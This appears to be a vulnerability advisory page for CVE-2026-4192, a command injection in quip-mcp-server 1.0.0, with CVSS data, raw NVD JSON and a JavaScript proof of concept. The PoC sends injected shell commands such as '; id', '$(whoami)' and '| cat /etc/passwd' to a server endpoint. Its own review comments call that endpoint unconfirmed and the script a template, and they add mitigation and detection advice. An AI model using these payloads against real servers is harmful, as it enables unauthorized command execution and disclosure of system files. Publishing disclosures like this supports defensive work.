Security Vulnerability Report
CVE-2026-4192 CVSS 6.3 MEDIUM

CVE-2026-4192

Published: 2026-03-16 14:20:03
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in AvinashBole quip-mcp-server 1.0.0. The affected code is the function setupToolHandlers in the file src/index.ts; manipulation of its input leads to command injection. The attack may be performed remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

quip-mcp-server <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-4192 PoC - Command Injection in quip-mcp-server
// Target: AvinashBole/quip-mcp-server 1.0.0
// Vulnerability: Command injection in setupToolHandlers function
//
// NOTE(review): the endpoint '/api/execute', the `{ tool, params }` request shape
// and the `output` response field used below are not established by anything in
// this report (the advisory only names the function setupToolHandlers in
// src/index.ts). Treat them as a constructed template that must be confirmed
// against the project's actual transport before this script is relied on as
// evidence either way.
//
// Mitigation for the reported bug class (CWE-77 in the record below): never
// interpolate tool arguments into a shell command string; pass them as an
// argument array to child_process.execFile/spawn without `shell: true`, and
// validate them against an allowlist first. Detection: alert on shell spawns
// from the server process whose arguments contain shell metacharacters.

// Third-party HTTP client; not part of the Node.js standard library.
const axios = require('axios');

// Malicious payload to inject command
const maliciousPayload = {
  // NOTE(review): the advisory names setupToolHandlers as the vulnerable
  // *function*, not as a tool name; this field is presumably an approximation.
  tool: "setupToolHandlers",
  params: {
    // Inject arbitrary command using semicolon separator
    // This will execute 'id' command and display user information
    command: "; id",
    // Alternative: Using command substitution
    // command: "$(whoami)",
    // Alternative: Using pipe to chain commands
    // command: "| cat /etc/passwd"
  }
};

/**
 * Sends the payload above to `targetUrl + '/api/execute'` and logs the response.
 * Resolves with no value in every case: errors are caught and only logged.
 *
 * @param {string} targetUrl - base URL of the server; joined by plain string
 *   concatenation, so a trailing slash yields '//api/execute'.
 * @returns {Promise<void>}
 */
async function exploit(targetUrl) {
  try {
    console.log('[*] Sending malicious request to target...');
    console.log('[*] Payload:', JSON.stringify(maliciousPayload));
    // Send the crafted request to the MCP server
    const response = await axios.post(targetUrl + '/api/execute', maliciousPayload, {
      headers: {
        'Content-Type': 'application/json',
        // Low privilege authentication may be required
        // (placeholder; the CVSS vector in this report records PR:L, i.e. a
        // low-privilege credential is assumed).
        'Authorization': 'Bearer <low_privilege_token>'
      },
      timeout: 10000
    });
    console.log('[+] Response received:');
    console.log(response.data);
    // Check if command was executed
    // NOTE(review): substring match only — any response containing 'root'
    // (e.g. an error message or a path) counts as a hit, so this is a weak
    // indicator and produces false positives.
    if (response.data && response.data.output && (response.data.output.includes('uid=') || response.data.output.includes('root'))) {
      console.log('[+] VULNERABLE! Command injection successful!');
      console.log('[+] Executed command output:', response.data.output);
    }
  } catch (error) {
    // Errors (network, timeout, non-2xx) are logged and swallowed; the caller
    // cannot distinguish "not vulnerable" from "request failed".
    console.error('[-] Error:', error.message);
    if (error.response) {
      console.error('[-] Response:', error.response.data);
    }
  }
}

// Usage
// Replace TARGET_URL with the actual quip-mcp-server endpoint
// const targetUrl = 'http://target-server:3000';
// exploit(targetUrl);

// Running the file as-is only prints these two lines; exploit() is never called.
console.log('CVE-2026-4192 PoC for quip-mcp-server Command Injection');
console.log('This PoC demonstrates how to inject system commands through vulnerable parameter.');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4192", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:02.670", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in AvinashBole quip-mcp-server 1.0.0. Affected by this vulnerability is the function setupToolHandlers of the file src/index.ts. Such manipulation leads to command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en AvinashBole quip-mcp-server 1.0.0. Afectada por esta vulnerabilidad es la función setupToolHandlers del archivo src/index.ts. Dicha manipulación conduce a inyección de comandos. El ataque puede ser realizado desde remoto. El exploit ha sido divulgado al público y puede ser utilizado. El proyecto fue informado del problema tempranamente a través de un informe de incidencias, pero no ha respondido aún."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": 
"NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/AvinashBole/quip-mcp-server/", "source": "[email protected]"}, {"url": 
"https://github.com/AvinashBole/quip-mcp-server/issues/4", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/25716541/quip-mcp-server_security_advisory.pdf", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351099", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351099", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770616", "source": "[email protected]"}]}}